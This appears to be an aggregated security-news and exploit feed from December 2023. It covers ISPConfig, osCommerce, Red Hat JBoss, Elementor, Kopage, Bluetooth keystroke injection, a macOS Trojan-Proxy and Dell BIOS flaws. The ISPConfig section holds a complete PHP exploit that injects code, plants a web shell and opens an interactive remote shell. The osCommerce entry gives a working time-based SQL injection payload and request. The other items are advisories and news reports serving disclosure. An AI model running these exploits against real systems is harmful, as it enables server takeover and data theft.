ISPConfig versions 4.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.

------------------------------------------------------------------------  
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
------------------------------------------------------------------------

[-] Software Link:

https://www.ispconfig.org

[-] Affected Versions:

Version 3.2.11 and prior versions.

[-] Vulnerabilities Description:

User input passed through the "records" POST parameter to  
/admin/language_edit.php is not properly sanitized before being used  
to dynamically generate PHP code that will be executed by the  
application. This can be exploited by malicious administrator users to  
inject and execute arbitrary PHP code on the web server.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-46818.php  
(Packet Storm Editor Note: See bottom of this file for PoC)

[-] Solution:

Upgrade to version 3.2.11p1 or later.

[-] Disclosure Timeline:

[25/10/2023] - Vendor notified  
[26/10/2023] - Version 3.2.11p1 released  
[27/10/2023] - CVE identifier assigned  
[07/12/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-46818 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-13

[-] Other References:

https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/

--- CVE-2023-46818.php PoC ---

<?php

/*  
    ------------------------------------------------------------------------  
    ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
    ------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://www.ispconfig.org

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "records" POST parameter to /admin/language_edit.php is  
    not properly sanitized before being used to dynamically generate PHP code that will be  
    executed by the application. This can be exploited by malicious administrator users to  
    inject and execute arbitrary PHP code on the web server.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2023-13  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Username> <Password>\n\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

@unlink('./cookies.txt');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "{$url}login/");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');  
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login");

if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Injecting shell\n";

$__phpcode = base64_encode("<?php print('____'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('____'); ?>");  
$injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#";  
$lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php");  
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}");

$res = curl_exec($ch);

if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n");  
if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));

curl_exec($ch);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php");  
curl_setopt($ch, CURLOPT_POST, false);

while(1)  
{  
    print "\nispconfig-shell# ";  
    if (($cmd = trim(fgets(STDIN))) == "exit") break;  
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);  
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");  
}

ISPConfig 3.2.11 PHP Code Injection

osCommerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: osCommerce 4 - SQL Injection# Exploit Author: CraCkEr# Date: 22/11/2023# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/b2b-supermarket/# Tested on: Windows 11 Home# Impact: Database Access# CWE: CWE-89 - CWE-74 - CWE-707# CVE: CVE-2023-6579# VDB: VDB-247160## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /b2b-supermarket/shopping-cartPOST Parameter 'estimate[country_id]' is vulnerable to SQLi---Parameter: estimate[country_id] (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: estimate[country_id]=223'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&estimate[post_code]=900001&estimate[shipping]=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw==----------------------------------------------POST /b2b-supermarket/shopping-cart HTTP/2estimate%5Bcountry_id%5D=[SQLi]&estimate%5Bpost_code%5D=900001&estimate%5Bshipping%5D=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw%3D%3D-------------------------------------------[-] Done

osCommerce 4 SQL Injection

Red Hat Security Advisory 2023-7623-03 - Red Hat JBoss Web Server 5.7.7 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include denial of service and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7623.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Web Server 5.7.7 release and security updateAdvisory ID:        RHSA-2023:7623-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7623Issue date:         2023-12-07Revision:           03CVE Names:          CVE-2023-0464====================================================================Summary: Red Hat JBoss Web Server 5.7.7 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.7 serves as a replacement for Red Hat JBoss Web Server 5.7.6. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* jbcs-httpd24-openssl: OpenSSL: Excessive time spent checking DH q parametervalue (CVE-2023-3817)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* openssl: Certificate policy check not enabled (CVE-2023-0466)* openssl: Invalid certificate policies in leaf certificates are silentlyignored (CVE-2023-0465)* openssl: Denial of service by excessive resource usage in verifying X509policy constraints (CVE-2023-0464)* tomcat: FileUpload: DoS due to accumulation of temporary files on Windows(CVE-2023-42794)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* openssl: Possible DoS translating ASN.1 object identifiers (CVE-2023-2650)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-0464References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2181082https://bugzilla.redhat.com/show_bug.cgi?id=2182561https://bugzilla.redhat.com/show_bug.cgi?id=2182565https://bugzilla.redhat.com/show_bug.cgi?id=2207947https://bugzilla.redhat.com/show_bug.cgi?id=2224962https://bugzilla.redhat.com/show_bug.cgi?id=2227852https://bugzilla.redhat.com/show_bug.cgi?id=2235370

Red Hat Security Advisory 2023-7623-03

Red Hat Security Advisory 2023-7622-03 - An update is now available for Red Hat JBoss Web Server 5.7.7 on Red Hat Enterprise Linux versions 7, 8, and 9. Issues addressed include denial of service and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7622.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Web Server 5.7.7 release and security updateAdvisory ID:        RHSA-2023:7622-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7622Issue date:         2023-12-07Revision:           03CVE Names:          CVE-2023-0464====================================================================Summary: An update is now available for Red Hat JBoss Web Server 5.7.7 on Red Hat Enterprise Linux versions 7, 8, and 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.7 serves as a replacement for Red Hat JBoss Web Server 5.7.6. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* jbcs-httpd24-openssl: OpenSSL: Excessive time spent checking DH q parameter value (CVE-2023-3817)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* openssl: Certificate policy check not enabled (CVE-2023-0466)* openssl: Invalid certificate policies in leaf certificates are silently ignored (CVE-2023-0465)* openssl: Denial of service by excessive resource usage in verifying X509 policy constraints (CVE-2023-0464)* openssl: Possible DoS translating ASN.1 object identifiers (CVE-2023-2650)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-0464References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2181082https://bugzilla.redhat.com/show_bug.cgi?id=2182561https://bugzilla.redhat.com/show_bug.cgi?id=2182565https://bugzilla.redhat.com/show_bug.cgi?id=2207947https://bugzilla.redhat.com/show_bug.cgi?id=2224962https://bugzilla.redhat.com/show_bug.cgi?id=2227852https://bugzilla.redhat.com/show_bug.cgi?id=2235370

Red Hat Security Advisory 2023-7622-03

WordPress Elementor plugin versions 3.18.1 and below are vulnerability to remote code execution via file upload in the template import functionality.

    Vulnerability Summary from Wordfence IntelligenceDescription: Elementor <= 3.18.1 Authenticated(Contributor+) Arbitrary File Upload to Remote Code Execution via Template Import Affected Plugin: ElementorPlugin Slug: elementorAffected Versions: <= 3.18.1CVE ID: CVE-2023-48777Pending CVSS Score: 8.8 (Highl)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HResearcher/s: Hồng Quân Fully Patched Version: 3.18.2The Elementor Website Builder plugin for WordPress is vulnerable to Remote Code Execution via file upload in all versions up to and including 3.18.1 via the template import functionality. This makes it possible for authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. Technical Analysis The source of the issue is the handle_elementor_upload function called by the import_template Elementor AJAX function, which is accessible to Contributor-level users and above. Although it uses file type validation, vulnerable versions first save the uploaded file to a temporary directory before checking the file type, and do not delete the temporary file if it fails this validation:public function handle_elementor_upload( array $file, $allowed_file_extensions = null{// If $file['fileData'] is set, it signals that the passed file is a Base64 string that needs to be decoded and// saved to a temporary file.if ( isset( $file['fileData']) {$file = $this->save_base64_to_tmp_file( $file );}$validation_result = $this->validate_file( $file, $allowed_file_extensions );if ( is_wp_error( $validation_result) {return $validation_result;}return $file;}This means that contributors with access to the Elementor editor could upload files of any type and they will be saved in a temporary directory with a randomized name. While attackers exploiting versions before 3.18.1 could use directory traversal to move the uploaded file into a more predictable location, the 3.18.1 partial patch sanitized the filename, meaning that it could only be uploaded directly to the temporary directory.Since the exploit returns a 500 error and provides no feedback on the location of the temporary directory, attackers would have difficulty finding the uploaded file unless directory indexing was enabled on the server, which is no longer common due to the many security risks it presents.ConclusionIn today's PSA, we covered a file upload vulnerability in Elementor affecting versions 3.18.1 and earlier. We strongly recommend updating to the latest version of Elementor, which is 3.18.2 as of this writing, as soon as possible, as this is a high-severity vulnerability which can be used by attackers to upload files and take control of a site.All Wordfence users, including those running Wordfence Premium , Wordfence Care , and Wordfence Response,  are fully protected against this vulnerability.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.Did you know that Wordfence has a Bug Bounty Program ? We’ve recently increased our bounties by 6.25x until December 20th, 2023, with our bounties for the most critical vulnerabilities reaching $10,000 USD! If you’re an aspiring or current vulnerability researcher, click here to sign up.

WordPress Elementor 3.18.1 File Upload / Remote Code Execution

Kopage Website Builder version 4.4.15 appears to suffer from a remote shell upload vulnerability.

    ## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE## Author: nu11secur1ty## Date: 12/08/2023## Vendor: https://www.kopage.com/## Software: https://demo.kopage.com/index.php## Reference: https://portswigger.net/web-security/file-upload,https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload## Description:The file upload function suffers from file upload vulnerability, thereis no strong sanitizing function for uploading some extension files.In this case, I uploaded an HTML web socket client on their server andthen I connected this client with my javascript server =)Depending on the scenario, this can be the end of privacy and evenworse than ever!I am a Penetration Tester, not a stupid cracker! Thank you all!STATUS: CRITICAL Vulnerability[+]Exploit client:```POST<html>  <script>(() => {  const ws = new WebSocket('ws://0.0.0.0:8080')  ws.onopen = () => {    console.log('ws opened on browser')    ws.send('hello world you are hacked :D')  }  ws.onmessage = (message) => {    console.log(`message received ${message}`)  }})() </script></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html)## Time spent:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Kopage Website Builder 4.4.15 Shell Upload

By Waqas
Another day, another Bluetooth vulnerability impacting billions of devices worldwide!
This is a post from HackRead.com Read the original post: Bluetooth Vulnerability Enables Keystroke Injection on Android, Linux, macOS, iOS

Keystroke injection is a method wherein malicious commands or keystrokes are remotely injected into a system to compromise or manipulate its functionality, often exploited for unauthorized access or control.

A critical vulnerability in Bluetooth allows attackers to take control of Android, Linux, macOS, and iOS devices, including devices in Lockdown Mode. This vulnerability is tracked as **CVE-2023-45866** and disclosed by security researcher Marc Newlin. 

It enables attackers to connect to vulnerable devices without user confirmation and inject keystrokes, potentially allowing them to install malicious apps, run arbitrary commands, and perform other unauthorized actions (except those requiring password/biometric authentication). The software vendors were notified about the flaw in August 2023.

This vulnerability was first identified in 2016 in non-Bluetooth wireless mice and keyboards. Back then, it was assumed that Bluetooth was secure and promoted as a better alternative to vulnerable custom protocols.

In 2023, a challenge forced Newlin to focus on Apple’s Magic Keyboard due to its **reliance on Bluetooth** and Apple’s security reputation. Initial research revealed limited information about Bluetooth, macOS, and iOS, necessitating extensive learning. 

Later, unauthenticated Bluetooth keystroke injection vulnerabilities in macOS and iOS were discovered, which were exploitable even when **Lockdown Mode** was enabled. Similar flaws were identified in Linux and Android, suggesting a broader issue beyond individual implementations. The Bluetooth HID specification analysis revealed a combination of protocol design and implementation bugs.

Newlin explained in his **post on GitHub** that multiple Bluetooth stacks had authentication bypass vulnerabilities. The attack exploits an “unauthenticated pairing mechanism” defined within the Bluetooth specification, tricking the target device into accepting a fake keyboard.

This deception allows an attacker in close proximity to connect and inject keystrokes, potentially enabling them to install apps and execute arbitrary commands. It is worth noting that unpatched devices are vulnerable under specific conditions, such as:

*   Android: Bluetooth must be enabled.
*   Linux/BlueZ: Bluetooth must be discoverable/connectable.
*   iOS/macOS: Bluetooth must be enabled, and a Magic Keyboard must be paired with the device.

These vulnerabilities can be exploited with a standard Bluetooth adapter on a Linux computer. Notably, some vulnerabilities predate “**MouseJack**“, affecting Android devices as far back as version 4.2.2 (released in 2012). 

In a comment to Hackread.com, Ken Dunham, Director of Cyber Threat at Qualys said “The two new Bluetooth vulnerabilities that exist for Android, Linux, MacOS, and iOS enable unauthorized attackers to perform an “unauthenticated pairing”, then possibly enable execution of code and to run arbitrary commands.”

“Bluetooth attacks are limited to close physical proximity. As a workaround, users of vulnerable systems can limit their attack surface and risk until patched by disabling Bluetooth,” Dunham advised.

While a fix for the Linux vulnerability existed since 2020 (**CVE-2020-0556**), it was surprisingly left disabled by default. Despite announcements by major Linux distributions, only ChromeOS is known to have implemented the fix. The latest BlueZ patch for CVE-2023-45866 finally enables this crucial fix by default.

It is a serious vulnerability impacting a vast array of devices, exposing potential security risks inherent to Bluetooth technology. However, according to Google, “fixes for these issues that affect Android 11 through 14 are available to impacted OEMs. All currently-supported Pixel devices will receive this fix via December OTA updates.”

1.  **BlueRepli attack bypasses Bluetooth authentication on Android**
2.  **BleedingTooth Bluetooth vulnerability allows RCE in Linux devices**
3.  **Update your devices: New Bluetooth flaw lets attackers monitor traffic**
4.  **BlueBorne Bluetooth Flaw Affects Millions of Smartphones, IoT and PCs**
5.  **Hackers can crash Google’s Nest Dropcams by exploiting Bluetooth flaws**

Bluetooth Vulnerability Enables Keystroke Injection on Android, Linux, macOS, iOS

By Deeba Ahmed
Stop installing pirated and cracked software to ensure the protection of your devices against Proxy Trojan and other new malware threats.
This is a post from HackRead.com Read the original post: Cracked macOS Software Laced with New Trojan Proxy Malware

Kaspersky recently uncovered the most recent Trojan Proxy malware campaign, revealing that the earliest submission of the payload on VirusTotal can be traced back to April 28, 2023.

Cybercriminals have typically been keen on **exploiting macOS** applications to target Mac users, and this time, they might just have hit the jackpot. According to the latest research from cybersecurity researchers at Kaspersky, threat actors are deploying a novel Trojan Proxy malware in cracked applications, distributed via unauthorized websites. The plan behind this operation is to compromise Mac devices.

Researchers observed that the campaign’s earliest payload submission on **VirusTotal** was on April 28, 2023. Further probing revealed that the malware is disguised within popular copyrighted macOS software available on warez sites.

For your information, Warez sites are websites that offer copyrighted digital content, such as software, movies, music, ebooks, and games, for free or at a significantly lower price than the original product.

The malware allows attackers to build a proxy server network to commit crimes or make profits. When installed, this malware converts computers into anonymous traffic-forwarding terminals, allowing malware operators to perform malicious activities, such as phishing, hacking, or conducting illegal transactions. 

“Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods” researchers explained in a **blog post**.

Infected applications appear as **legitimate cracked software**, distributed as .PKG installers rather than the usual disk images. A post-installation script replaces two system files with malicious versions from the app resources and grants them administration permissions. A fake Google configuration file (p.plist) automatically starts the WindowServer malware file as a system process. 

This binary file was uploaded on VirusTotal on April 28 but wasn’t recognized as malware then. The malware utilizes DNS-over-HTTPS (DoH) to get the C2 server IP address and connects via WebSockets, receiving commands for the various malicious activities the Trojan can perform and sending information. 

However, during their research, investigators didn’t receive a server response beyond the 0x38 command and noted that the client supported TCP and UDP connections. Earlier versions relied on traditional DNS requests instead of DoH for C&C server acquisition.

It is worth noting that selling access to these proxies is a highly profitable business, encompassing massive botnets. Kaspersky researchers noted that Mac devices aren’t immune to this deep-rooted threat, which is why this campaign works. 

Attackers are exploiting the popularity of cracked versions of copyrighted software, specifically commercial software/programs, as users prefer to avoid paying for premium software.

Around 35 instances of popular image editing, data recovery, video compression and editing, and network scanning tools-related apps laced with Trojan Proxy were identified by Kaspersky.

Beyond **macOS**, researchers have identified Android and Windows versions connecting to the same C&C server. This means a larger distribution network for cracked software laced with Trojan Proxy malware could be at work.

Menlo Security’s chief security architect, **Lionel Litty**, shared with Hackread.com that using DoH and WebSocket indicates that threat actors are focusing more on evading network-based detection mechanisms.

“The use of DoH and WebSocket shows that more sophisticated bad actors are focused on evading network-based detection mechanisms an enterprise may have deployed,” Litty explained.

“DoH will often mean the malware can evade detection from products that look at DNS traffic for IOCs since DNS traffic is now wrapped within HTTPS connections that may not be inspected or that are inspected by solutions that do not understand DoH semantics,” Little added.

“Likewise, network devices that inspect HTTPS traffic may not understand WebSocket semantics and may fail to run signature-based detections that target the payloads of C&C traffic used by the malware” Litty warned.

****_RELATED ARTICLES_****

1.  **macOS Ventura Background Task Flaws Exploited for Malware**
2.  **LockBit Ransomware Expands Attack Spectrum to Mac Devices**
3.  **MacStealer: A New Malware Targeting macOS Catalina Devices**
4.  **Windows, Linux, macOS Users Targeted by Chinese Iron Tiger APT**
5.  **New Malware Turns Windows and macOS Devices into Proxy Nodes**

Cracked macOS Software Laced with New Trojan Proxy Malware

Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new Trojan-Proxy malware.
"Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit

Endpoint Security / Malware

Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new **Trojan-Proxy** malware.

"Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said.

The Russian cybersecurity firm said it found evidence indicating that the malware is a cross-platform threat, owing to artifacts unearthed for Windows and Android that piggybacked on pirated tools.

The macOS variants propagate under the guise of legitimate multimedia, image editing, data recovery, and productivity tools. This suggests that users searching for pirated software are the targets of the campaign.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

Unlike their genuine, unaltered counterparts, which are offered as disk image (.DMG) files, the rogue versions are delivered in the form of .PKG installers, which come equipped with a post-install script that activates the malicious behavior post installation.

"As an installer often requests administrator permissions to function, the script run by the installer process inherits those," Puzan noted.

The end goal of the campaign is to launch the Trojan-Proxy, which masks itself as the WindowServer process on macOS to evade detection. WindowServer is a core system process responsible for window management and rendering the graphical user interface (GUI) of applications.

Upon start, it attempts to obtain the IP address of the command-and-control (C2) server to connect to via DNS-over-HTTPS (DoH) by encrypting the DNS requests and responses using the HTTPS protocol.

Trojan-Proxy subsequently establishes contact with the C2 server and awaits further instructions, including processing incoming messages to parse the IP address to connect to, the protocol to use, and the message to send, signaling that its ability to act as a proxy via TCP or UDP to redirect traffic through the infected host.

Kaspersky said it found samples of the malware uploaded to the VirusTotal scanning engine as early as April 28, 2023. To mitigate such threats, users are recommended to avoid downloading software from untrusted sources.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software


Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation.



Article Number: 000219550

**Article Content**

**Impact**

High

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32460

Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation.

8.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32460

Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation.

8.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

The Affected Products and Remediation table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.  

**Workarounds and Mitigations**

None

**Revision History**

Revision

Date

Description

1.0

2023-12-07

Initial release

2.0

2023-12-07

*   Updated the downloadable link for PowerEdge R6515
*   Updated the BIOS version to v2.18.2 for PowerEdge C6320, Dell XC6320 Hyper-converged Appliance
*   Updated the BIOS version to v2.19.1 for PowerEdge R330/R230/T330/T130

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Article Properties**

**Affected Product**

DSS 8440, Dell EMC XC Core XCXR2, Dell EMC XC Core XC450, Dell EMC XC Core XC650, Dell EMC XC Core XC6520, Dell EMC XC Core XC740xd2, Dell EMC XC Core XC750, Dell EMC XC Core XC750xa, Dell XC430 Hyper-converged Appliance , Dell XC630 Hyper-converged Appliance, Dell XC6320 Hyper-converged Appliance, Dell EMC XC Core XC640 System, Dell EMC XC Core 6420 System, Dell XC Core XC660, Dell XC730 Hyper-converged Appliance, Dell XC730XD Hyper-converged Appliance, Dell EMC XC Core XC740xd System, Dell XC Core XC760, Dell EMC XC Core XC940 System, PowerEdge XR2, PowerEdge C4130, Poweredge C4140, PowerEdge c6320, PowerEdge C6420, PowerEdge C6520, PowerEdge C6525, PowerEdge C6615, PowerEdge C6620, Poweredge FC430, Poweredge FC630, PowerEdge FC640, Poweredge FC830, PowerEdge HS5610, PowerEdge HS5620, PowerEdge M630, PowerEdge M630 (for PE VRTX), PowerEdge M640, PowerEdge M640 (for PE VRTX), PowerEdge M830, PowerEdge M830 (for PE VRTX), PowerEdge MX740C, PowerEdge MX750c, PowerEdge MX760c, PowerEdge MX840C, PowerEdge R230, PowerEdge R240, PowerEdge R250, PowerEdge R330, PowerEdge R340, PowerEdge R350, PowerEdge R430, PowerEdge R440, PowerEdge R450, PowerEdge R530, PowerEdge R540, PowerEdge R550, PowerEdge R630, PowerEdge R640, PowerEdge R6415, PowerEdge R650, PowerEdge R650xs, PowerEdge R6515, PowerEdge R6525, PowerEdge R660, PowerEdge R660xs, PowerEdge R6615, PowerEdge R6625, PowerEdge R730, PowerEdge R730xd, PowerEdge R740, PowerEdge R740XD, PowerEdge R740XD2, PowerEdge R7415, PowerEdge R7425, PowerEdge R750, PowerEdge R750XA, PowerEdge R750xs, PowerEdge R7515, PowerEdge R7525, PowerEdge R760, PowerEdge R760XA, PowerEdge R760xd2, PowerEdge R760xs, PowerEdge R7615, PowerEdge R7625, PowerEdge R830, PowerEdge R840, PowerEdge R860, PowerEdge R930, PowerEdge R940, PowerEdge R940xa, PowerEdge R960, PowerEdge T130, PowerEdge T140, PowerEdge T150, PowerEdge T330, PowerEdge T340, PowerEdge T350, PowerEdge T430, PowerEdge T440, PowerEdge T550, PowerEdge T560, PowerEdge T630, PowerEdge T640, PowerEdge XE2420, PowerEdge XE7420, PowerEdge XE7440, PowerEdge XE8545, PowerEdge XE8640, PowerEdge XE9640, PowerEdge XE9680, PowerEdge XR11, PowerEdge XR12, PowerEdge XR4510c, PowerEdge XR4520c, PowerEdge XR5610, PowerEdge XR7620, PowerEdge XR8610t, PowerEdge XR8620t, Dell Storage NX3230, Dell EMC Storage NX3240, Dell Storage NX3330, Dell EMC Storage NX3340, Dell Storage NX430, Dell EMC NX440, Dell EMC XC Core XC7525 ...

**Last Published Date**

07 Dec 2023

**Version**

5

**Article Type**

Dell Security Advisory

Tag

#auth